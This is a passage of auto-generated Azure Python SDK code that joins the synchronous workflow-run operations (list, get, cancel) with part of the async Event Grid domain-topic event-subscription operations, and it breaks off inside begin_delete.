    return HttpRequest(method="GET", url=url, params=query_map, headers=header_map, **kwargs)
def build_get_request(
    resource_group_name: str, name: str, workflow_name: str, run_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
    """Assemble the GET request that retrieves a single workflow run.

    Path parameters are serialized into the ARM URL template; remaining
    ``kwargs`` are forwarded to :class:`~azure.core.rest.HttpRequest`.
    """
    header_map = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    query_map = case_insensitive_dict(kwargs.pop("params", {}) or {})

    api_version: Literal["2022-09-01"] = kwargs.pop("api_version", query_map.pop("api-version", "2022-09-01"))
    accept = header_map.pop("Accept", "application/json")

    # URL template (overridable via ``template_url``) and its path arguments.
    template = kwargs.pop(
        "template_url",
        "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{name}/hostruntime/runtime/webhooks/workflow/api/management/workflows/{workflowName}/runs/{runName}",
    )  # pylint: disable=line-too-long
    path_args = {
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
        "resourceGroupName": _SERIALIZER.url(
            "resource_group_name",
            resource_group_name,
            "str",
            max_length=90,
            min_length=1,
            pattern=r"^[-\w\._\(\)]+[^\.]$",
        ),
        "name": _SERIALIZER.url("name", name, "str"),
        "workflowName": _SERIALIZER.url("workflow_name", workflow_name, "str"),
        "runName": _SERIALIZER.url("run_name", run_name, "str"),
    }
    url = _format_url_section(template, **path_args)

    # Query string and headers.
    query_map["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
    header_map["Accept"] = _SERIALIZER.header("accept", accept, "str")

    return HttpRequest(method="GET", url=url, params=query_map, headers=header_map, **kwargs)
def build_cancel_request(
    resource_group_name: str, name: str, workflow_name: str, run_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
    """Assemble the POST request that cancels a workflow run.

    Path parameters are serialized into the ARM URL template; remaining
    ``kwargs`` are forwarded to :class:`~azure.core.rest.HttpRequest`.
    """
    header_map = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    query_map = case_insensitive_dict(kwargs.pop("params", {}) or {})

    api_version: Literal["2022-09-01"] = kwargs.pop("api_version", query_map.pop("api-version", "2022-09-01"))
    accept = header_map.pop("Accept", "application/json")

    # URL template (overridable via ``template_url``) and its path arguments.
    template = kwargs.pop(
        "template_url",
        "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{name}/hostruntime/runtime/webhooks/workflow/api/management/workflows/{workflowName}/runs/{runName}/cancel",
    )  # pylint: disable=line-too-long
    path_args = {
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
        "resourceGroupName": _SERIALIZER.url(
            "resource_group_name",
            resource_group_name,
            "str",
            max_length=90,
            min_length=1,
            pattern=r"^[-\w\._\(\)]+[^\.]$",
        ),
        "name": _SERIALIZER.url("name", name, "str"),
        "workflowName": _SERIALIZER.url("workflow_name", workflow_name, "str"),
        "runName": _SERIALIZER.url("run_name", run_name, "str"),
    }
    url = _format_url_section(template, **path_args)

    # Query string and headers.
    query_map["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
    header_map["Accept"] = _SERIALIZER.header("accept", accept, "str")

    return HttpRequest(method="POST", url=url, params=query_map, headers=header_map, **kwargs)
class WorkflowRunsOperations:
    """
    .. warning::
        **DO NOT** instantiate this class directly.
    Instead, you should access the following operations through
    :class:`~azure.mgmt.web.v2022_09_01.WebSiteManagementClient`'s
    :attr:`workflow_runs` attribute.
    """
    # Expose the models module so callers can reach the response types.
    models = _models
    def __init__(self, *args, **kwargs):
        # Client plumbing is injected positionally by the generated service
        # client, with keyword fallbacks for manual wiring.
        input_args = list(args)
        self._client = input_args.pop(0) if input_args else kwargs.pop("client")
        self._config = input_args.pop(0) if input_args else kwargs.pop("config")
        self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
        self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
    @distributed_trace
    def list(
        self,
        resource_group_name: str,
        name: str,
        workflow_name: str,
        top: Optional[int] = None,
        filter: Optional[str] = None,
        **kwargs: Any
    ) -> Iterable["_models.WorkflowRun"]:
        """Gets a list of workflow runs.
        :param resource_group_name: Name of the resource group to which the resource belongs. Required.
        :type resource_group_name: str
        :param name: Site name. Required.
        :type name: str
        :param workflow_name: The workflow name. Required.
        :type workflow_name: str
        :param top: The number of items to be included in the result. Default value is None.
        :type top: int
        :param filter: The filter to apply on the operation. Options for filters include: Status,
        StartTime, and ClientTrackingId. Default value is None.
        :type filter: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either WorkflowRun or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2022_09_01.models.WorkflowRun]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        api_version: Literal["2022-09-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01"))
        cls: ClsType[_models.WorkflowRunListResult] = kwargs.pop("cls", None)
        # Map well-known HTTP failures onto azure-core exception types;
        # callers may extend or override the mapping via ``error_map``.
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        def prepare_request(next_link=None):
            # First page: build the request from the URL template.
            if not next_link:
                request = build_list_request(
                    resource_group_name=resource_group_name,
                    name=name,
                    workflow_name=workflow_name,
                    subscription_id=self._config.subscription_id,
                    top=top,
                    filter=filter,
                    api_version=api_version,
                    template_url=self.list.metadata["url"],
                    headers=_headers,
                    params=_params,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                # make call to next link with the client's api-version
                # Subsequent pages: re-issue the service-provided next link,
                # preserving its query string but forcing the client's
                # api-version.
                _parsed_next_link = urllib.parse.urlparse(next_link)
                _next_request_params = case_insensitive_dict(
                    {
                        key: [urllib.parse.quote(v) for v in value]
                        for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
                    }
                )
                _next_request_params["api-version"] = self._config.api_version
                request = HttpRequest(
                    "GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request
        def extract_data(pipeline_response):
            # Deserialize one page and return (continuation token, items).
            deserialized = self._deserialize("WorkflowRunListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)  # type: ignore
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Fetch a single page; anything other than HTTP 200 is an error.
            request = prepare_request(next_link)
            _stream = False
            pipeline_response: PipelineResponse = self._client._pipeline.run(  # pylint: disable=protected-access
                request, stream=_stream, **kwargs
            )
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        # Lazily page through the results.
        return ItemPaged(get_next, extract_data)
    # Default URL template consumed by ``build_list_request``.
    list.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{name}/hostruntime/runtime/webhooks/workflow/api/management/workflows/{workflowName}/runs"
    }
    @distributed_trace
    def get(
        self, resource_group_name: str, name: str, workflow_name: str, run_name: str, **kwargs: Any
    ) -> _models.WorkflowRun:
        """Gets a workflow run.
        :param resource_group_name: Name of the resource group to which the resource belongs. Required.
        :type resource_group_name: str
        :param name: Site name. Required.
        :type name: str
        :param workflow_name: The workflow name. Required.
        :type workflow_name: str
        :param run_name: The workflow run name. Required.
        :type run_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: WorkflowRun or the result of cls(response)
        :rtype: ~azure.mgmt.web.v2022_09_01.models.WorkflowRun
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        # Map well-known HTTP failures onto azure-core exception types.
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        api_version: Literal["2022-09-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01"))
        cls: ClsType[_models.WorkflowRun] = kwargs.pop("cls", None)
        request = build_get_request(
            resource_group_name=resource_group_name,
            name=name,
            workflow_name=workflow_name,
            run_name=run_name,
            subscription_id=self._config.subscription_id,
            api_version=api_version,
            template_url=self.get.metadata["url"],
            headers=_headers,
            params=_params,
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        _stream = False
        pipeline_response: PipelineResponse = self._client._pipeline.run(  # pylint: disable=protected-access
            request, stream=_stream, **kwargs
        )
        response = pipeline_response.http_response
        # Anything other than HTTP 200 is surfaced as an ARM error.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize("WorkflowRun", pipeline_response)
        # Optional caller hook receives the raw response alongside the model.
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    # Default URL template consumed by ``build_get_request``.
    get.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{name}/hostruntime/runtime/webhooks/workflow/api/management/workflows/{workflowName}/runs/{runName}"
    }
    @distributed_trace
    def cancel(  # pylint: disable=inconsistent-return-statements
        self, resource_group_name: str, name: str, workflow_name: str, run_name: str, **kwargs: Any
    ) -> None:
        """Cancels a workflow run.
        :param resource_group_name: Name of the resource group to which the resource belongs. Required.
        :type resource_group_name: str
        :param name: Site name. Required.
        :type name: str
        :param workflow_name: The workflow name. Required.
        :type workflow_name: str
        :param run_name: The workflow run name. Required.
        :type run_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None or the result of cls(response)
        :rtype: None
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        # Map well-known HTTP failures onto azure-core exception types.
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        api_version: Literal["2022-09-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01"))
        cls: ClsType[None] = kwargs.pop("cls", None)
        request = build_cancel_request(
            resource_group_name=resource_group_name,
            name=name,
            workflow_name=workflow_name,
            run_name=run_name,
            subscription_id=self._config.subscription_id,
            api_version=api_version,
            template_url=self.cancel.metadata["url"],
            headers=_headers,
            params=_params,
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        _stream = False
        pipeline_response: PipelineResponse = self._client._pipeline.run(  # pylint: disable=protected-access
            request, stream=_stream, **kwargs
        )
        response = pipeline_response.http_response
        # Anything other than HTTP 200 is surfaced as an ARM error.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        # Cancel has no body; only invoke the optional caller hook.
        if cls:
            return cls(pipeline_response, None, {})
    # Default URL template consumed by ``build_cancel_request``.
    cancel.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{name}/hostruntime/runtime/webhooks/workflow/api/management/workflows/{workflowName}/runs/{runName}/cancel"
    }
|
PypiClean
|
/azure-mgmt-eventgrid-10.3.0b1.zip/azure-mgmt-eventgrid-10.3.0b1/azure/mgmt/eventgrid/aio/operations/_domain_topic_event_subscriptions_operations.py
|
import sys
from typing import Any, AsyncIterable, Callable, Dict, IO, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._domain_topic_event_subscriptions_operations import (
build_create_or_update_request,
build_delete_request,
build_get_delivery_attributes_request,
build_get_full_url_request,
build_get_request,
build_list_request,
build_update_request,
)
# ``Literal`` moved into ``typing`` in Python 3.8; older interpreters get it
# from the ``typing_extensions`` backport.
if sys.version_info >= (3, 8):
    from typing import Literal  # pylint: disable=no-name-in-module, ungrouped-imports
else:
    from typing_extensions import Literal  # type: ignore # pylint: disable=ungrouped-imports
# Generic type variable for the deserialized response payload.
T = TypeVar("T")
# Signature of the optional ``cls`` callback that post-processes a response:
# it receives the pipeline response, the deserialized object, and headers.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class DomainTopicEventSubscriptionsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.eventgrid.aio.EventGridManagementClient`'s
:attr:`domain_topic_event_subscriptions` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
    @distributed_trace_async
    async def get(
        self, resource_group_name: str, domain_name: str, topic_name: str, event_subscription_name: str, **kwargs: Any
    ) -> _models.EventSubscription:
        """Get a nested event subscription for domain topic.
        Get properties of a nested event subscription for a domain topic.
        :param resource_group_name: The name of the resource group within the user's subscription.
        Required.
        :type resource_group_name: str
        :param domain_name: Name of the top level domain. Required.
        :type domain_name: str
        :param topic_name: Name of the domain topic. Required.
        :type topic_name: str
        :param event_subscription_name: Name of the event subscription. Required.
        :type event_subscription_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: EventSubscription or the result of cls(response)
        :rtype: ~azure.mgmt.eventgrid.models.EventSubscription
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        # Map well-known HTTP failures onto azure-core exception types;
        # callers may extend or override the mapping via ``error_map``.
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        # api-version defaults to the client configuration rather than a
        # hard-coded literal.
        api_version: Literal["2022-06-15"] = kwargs.pop(
            "api_version", _params.pop("api-version", self._config.api_version)
        )
        cls: ClsType[_models.EventSubscription] = kwargs.pop("cls", None)
        request = build_get_request(
            resource_group_name=resource_group_name,
            domain_name=domain_name,
            topic_name=topic_name,
            event_subscription_name=event_subscription_name,
            subscription_id=self._config.subscription_id,
            api_version=api_version,
            template_url=self.get.metadata["url"],
            headers=_headers,
            params=_params,
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response: PipelineResponse = await self._client._pipeline.run(  # pylint: disable=protected-access
            request, stream=False, **kwargs
        )
        response = pipeline_response.http_response
        # Anything other than HTTP 200 is surfaced as an ARM error.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize("EventSubscription", pipeline_response)
        # Optional caller hook receives the raw response alongside the model.
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    # Default URL template consumed by ``build_get_request``.
    get.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
    }
    async def _create_or_update_initial(
        self,
        resource_group_name: str,
        domain_name: str,
        topic_name: str,
        event_subscription_name: str,
        event_subscription_info: Union[_models.EventSubscription, IO],
        **kwargs: Any
    ) -> _models.EventSubscription:
        # Initial (non-polling) call of the create-or-update LRO; the
        # ``begin_create_or_update`` wrapper drives polling around this.
        # Map well-known HTTP failures onto azure-core exception types.
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        api_version: Literal["2022-06-15"] = kwargs.pop(
            "api_version", _params.pop("api-version", self._config.api_version)
        )
        content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
        cls: ClsType[_models.EventSubscription] = kwargs.pop("cls", None)
        content_type = content_type or "application/json"
        # The body is sent either as raw content (IO/bytes passthrough) or as
        # a serialized EventSubscription model — never both.
        _json = None
        _content = None
        if isinstance(event_subscription_info, (IO, bytes)):
            _content = event_subscription_info
        else:
            _json = self._serialize.body(event_subscription_info, "EventSubscription")
        request = build_create_or_update_request(
            resource_group_name=resource_group_name,
            domain_name=domain_name,
            topic_name=topic_name,
            event_subscription_name=event_subscription_name,
            subscription_id=self._config.subscription_id,
            api_version=api_version,
            content_type=content_type,
            json=_json,
            content=_content,
            template_url=self._create_or_update_initial.metadata["url"],
            headers=_headers,
            params=_params,
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response: PipelineResponse = await self._client._pipeline.run(  # pylint: disable=protected-access
            request, stream=False, **kwargs
        )
        response = pipeline_response.http_response
        # 200 (updated) and 201 (created) are the only success codes.
        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        if response.status_code == 200:
            deserialized = self._deserialize("EventSubscription", pipeline_response)
        if response.status_code == 201:
            deserialized = self._deserialize("EventSubscription", pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})  # type: ignore
        return deserialized  # type: ignore
    # Default URL template consumed by ``build_create_or_update_request``.
    _create_or_update_initial.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
    }
    # Typing-only overload: accepts an EventSubscription model as the body.
    # The runtime implementation is the non-overloaded method defined below.
    @overload
    async def begin_create_or_update(
        self,
        resource_group_name: str,
        domain_name: str,
        topic_name: str,
        event_subscription_name: str,
        event_subscription_info: _models.EventSubscription,
        *,
        content_type: str = "application/json",
        **kwargs: Any
    ) -> AsyncLROPoller[_models.EventSubscription]:
        """Create or update a nested event subscription to a domain topic.
        Asynchronously creates a new event subscription or updates an existing event subscription.
        :param resource_group_name: The name of the resource group within the user's subscription.
        Required.
        :type resource_group_name: str
        :param domain_name: Name of the top level domain. Required.
        :type domain_name: str
        :param topic_name: Name of the domain topic. Required.
        :type topic_name: str
        :param event_subscription_name: Name of the event subscription to be created. Event
        subscription names must be between 3 and 100 characters in length and use alphanumeric letters
        only. Required.
        :type event_subscription_name: str
        :param event_subscription_info: Event subscription properties containing the destination and
        filter information. Required.
        :type event_subscription_info: ~azure.mgmt.eventgrid.models.EventSubscription
        :keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
        Default value is "application/json".
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
        this operation to not poll, or pass in your own initialized polling object for a personal
        polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
        Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either EventSubscription or the result of
        cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.eventgrid.models.EventSubscription]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
    # Typing-only overload: accepts a raw IO stream as the body.
    # The runtime implementation is the non-overloaded method defined below.
    @overload
    async def begin_create_or_update(
        self,
        resource_group_name: str,
        domain_name: str,
        topic_name: str,
        event_subscription_name: str,
        event_subscription_info: IO,
        *,
        content_type: str = "application/json",
        **kwargs: Any
    ) -> AsyncLROPoller[_models.EventSubscription]:
        """Create or update a nested event subscription to a domain topic.
        Asynchronously creates a new event subscription or updates an existing event subscription.
        :param resource_group_name: The name of the resource group within the user's subscription.
        Required.
        :type resource_group_name: str
        :param domain_name: Name of the top level domain. Required.
        :type domain_name: str
        :param topic_name: Name of the domain topic. Required.
        :type topic_name: str
        :param event_subscription_name: Name of the event subscription to be created. Event
        subscription names must be between 3 and 100 characters in length and use alphanumeric letters
        only. Required.
        :type event_subscription_name: str
        :param event_subscription_info: Event subscription properties containing the destination and
        filter information. Required.
        :type event_subscription_info: IO
        :keyword content_type: Body Parameter content-type. Content type parameter for binary body.
        Default value is "application/json".
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
        this operation to not poll, or pass in your own initialized polling object for a personal
        polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
        Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either EventSubscription or the result of
        cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.eventgrid.models.EventSubscription]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
    @distributed_trace_async
    async def begin_create_or_update(
        self,
        resource_group_name: str,
        domain_name: str,
        topic_name: str,
        event_subscription_name: str,
        event_subscription_info: Union[_models.EventSubscription, IO],
        **kwargs: Any
    ) -> AsyncLROPoller[_models.EventSubscription]:
        """Create or update a nested event subscription to a domain topic.
        Asynchronously creates a new event subscription or updates an existing event subscription.
        :param resource_group_name: The name of the resource group within the user's subscription.
         Required.
        :type resource_group_name: str
        :param domain_name: Name of the top level domain. Required.
        :type domain_name: str
        :param topic_name: Name of the domain topic. Required.
        :type topic_name: str
        :param event_subscription_name: Name of the event subscription to be created. Event
         subscription names must be between 3 and 100 characters in length and use alphanumeric letters
         only. Required.
        :type event_subscription_name: str
        :param event_subscription_info: Event subscription properties containing the destination and
         filter information. Is either a model type or a IO type. Required.
        :type event_subscription_info: ~azure.mgmt.eventgrid.models.EventSubscription or IO
        :keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
         Default value is None.
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either EventSubscription or the result of
         cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.eventgrid.models.EventSubscription]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        # Pin the service API version; callers may override it via kwargs or
        # an explicit "api-version" query parameter.
        api_version: Literal["2022-06-15"] = kwargs.pop(
            "api_version", _params.pop("api-version", self._config.api_version)
        )
        content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
        cls: ClsType[_models.EventSubscription] = kwargs.pop("cls", None)
        polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token: Optional[str] = kwargs.pop("continuation_token", None)
        if cont_token is None:
            # First call: fire the initial PUT and keep the raw pipeline
            # response (identity cls lambda) so the poller can drive the LRO.
            raw_result = await self._create_or_update_initial(
                resource_group_name=resource_group_name,
                domain_name=domain_name,
                topic_name=topic_name,
                event_subscription_name=event_subscription_name,
                event_subscription_info=event_subscription_info,
                api_version=api_version,
                content_type=content_type,
                cls=lambda x, y, z: x,
                headers=_headers,
                params=_params,
                **kwargs
            )
        # error_map was only meaningful for the initial call; drop it before
        # the remaining kwargs are forwarded to the polling method.
        kwargs.pop("error_map", None)
        def get_long_running_output(pipeline_response):
            # Deserialize the final response once polling completes.
            deserialized = self._deserialize("EventSubscription", pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True:
            polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
        elif polling is False:
            polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
        else:
            # Caller supplied a fully initialized polling object.
            polling_method = polling
        if cont_token:
            # Resume a previously started operation from its saved state.
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)  # type: ignore
    begin_create_or_update.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
    }
async def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, domain_name: str, topic_name: str, event_subscription_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
}
    @distributed_trace_async
    async def begin_delete(
        self, resource_group_name: str, domain_name: str, topic_name: str, event_subscription_name: str, **kwargs: Any
    ) -> AsyncLROPoller[None]:
        """Delete a nested event subscription for a domain topic.
        Delete a nested existing event subscription for a domain topic.
        :param resource_group_name: The name of the resource group within the user's subscription.
         Required.
        :type resource_group_name: str
        :param domain_name: Name of the top level domain. Required.
        :type domain_name: str
        :param topic_name: Name of the domain topic. Required.
        :type topic_name: str
        :param event_subscription_name: Name of the event subscription to be deleted. Event
         subscription names must be between 3 and 100 characters in length and use alphanumeric letters
         only. Required.
        :type event_subscription_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[None]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        # Pin the service API version; callers may override via kwargs or query params.
        api_version: Literal["2022-06-15"] = kwargs.pop(
            "api_version", _params.pop("api-version", self._config.api_version)
        )
        cls: ClsType[None] = kwargs.pop("cls", None)
        polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token: Optional[str] = kwargs.pop("continuation_token", None)
        if cont_token is None:
            # First call: fire the initial DELETE and keep the raw pipeline
            # response (identity cls lambda) so the poller can drive the LRO.
            raw_result = await self._delete_initial(  # type: ignore
                resource_group_name=resource_group_name,
                domain_name=domain_name,
                topic_name=topic_name,
                event_subscription_name=event_subscription_name,
                api_version=api_version,
                cls=lambda x, y, z: x,
